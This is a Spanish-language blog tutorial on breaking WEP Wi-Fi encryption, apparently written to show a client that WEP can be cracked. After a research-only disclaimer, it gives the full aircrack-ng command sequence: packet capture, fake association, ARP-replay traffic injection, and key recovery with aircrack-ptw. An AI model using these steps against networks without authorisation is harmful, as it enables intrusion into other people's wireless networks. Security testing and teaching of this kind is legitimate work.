Por una necesidad laboral, tuve que demostrar que WEP es falible. Aunque que yo 'sabía' que ésto podía hacerse, en la práctica nunca lo hice yo.

Nota: Esto es para fines de investigación, aprendizaje, y verificación de seguridad. No debe usarse para vulnerar redes de otras personas. Atacar y vulnerar redes (u otros recursos) es malo, e ilegal.

Investigando un poco, encontré que la placa de red de mi Sony Vaio VGN N350FE, una Intel 3945ABG, no permitía ciertas cosas desde linux, entre las cuales una de ellas era necesaria para poder demostrar esta vulnerabilidad.
Si leyeron mis posts anteriores, verán que no es el primer problema que encuentro con el hardware.
Tampoco es el primero al que encuentro solución :-)

Encontré un howto en http://foro.seguridadwireless.net/index.php?topic=3227.0 que usé como base.

A continuación, les explico los pasos que seguí para romper WEP.
Necesitamos una distribución de linux que podemos encontrar en http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. Bajamos la imagen del CD, y la quemamos.

Iniciamos la máquina con WifiWay (debe estar configurada para permitir iniciar desde CD/DVD).

Una vez iniciada, iniciamos el entorno gráfico mediante el comando:

startx

Ingresamos el canal en el que está el AP (Access Point) en la placa de red.

echo 'CANAL_DE_CAPTURA' > /sys/class/net/wifi0/device/channel

Obtenemos el BSSID, el canal, y el ESSID.

airodump-ng rtap0

Cerramos la ejecución con CONTROL-C, y utilizamos configuramos el BSSID (un número hexadecimal de 6 posiciones) en la placa de red.

echo 'BSSID_DEL_ACCESS_POINT' > /sys/class/net/wifi0/device/bssid

Una vez hecho esto, iniciamos la captura.

airodump-ng -c CANAL_DE_CAPTURA -w ARCHIVO_CAPTURA rtap0

Abrimos otra ventana y configuramos la velocidad a 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

Subimos la placa de red.

ifconfig wifi0 up

Averiguamos la MAC address, son los 12 primeros numeros de HWaddr

ifconfig

Iniciamos una asociación con el AP.

aireplay-ng -1 0 -a BSSID_DEL_ACCESS_POINT -h MAC_ADDRESS_WIFI -e ESSID_DEL_ACCESSPOINT wifi0

Abrimos otra consola y ponemos para inyectar tráfico.

aireplay-ng -3 -b BSSID_DEL_ACCESS_POINT -e ESSID_DEL_ACCESSPOINT -h MAC_ADDRESS_WIFI wifi0

Esto debería aumentar los #data en la ventana de captura (pasa un momento antes que empiece a aumentar).
Cuando tengamos mas de 100.000 podemos extraer la clave ejecutando:

aircrack-ptw ARCHIVO_CAPTURA.cap

Esto debería encontrar la clave de red en formato hexadecimal.

Nota: En todos los comandos anteriores, wordpress convierte automáticamente las comillas a comillas formateadas. Por favor usar comillas simples.

Espero, estimados lectores, que esto haya sido de utilidad.

Saludos!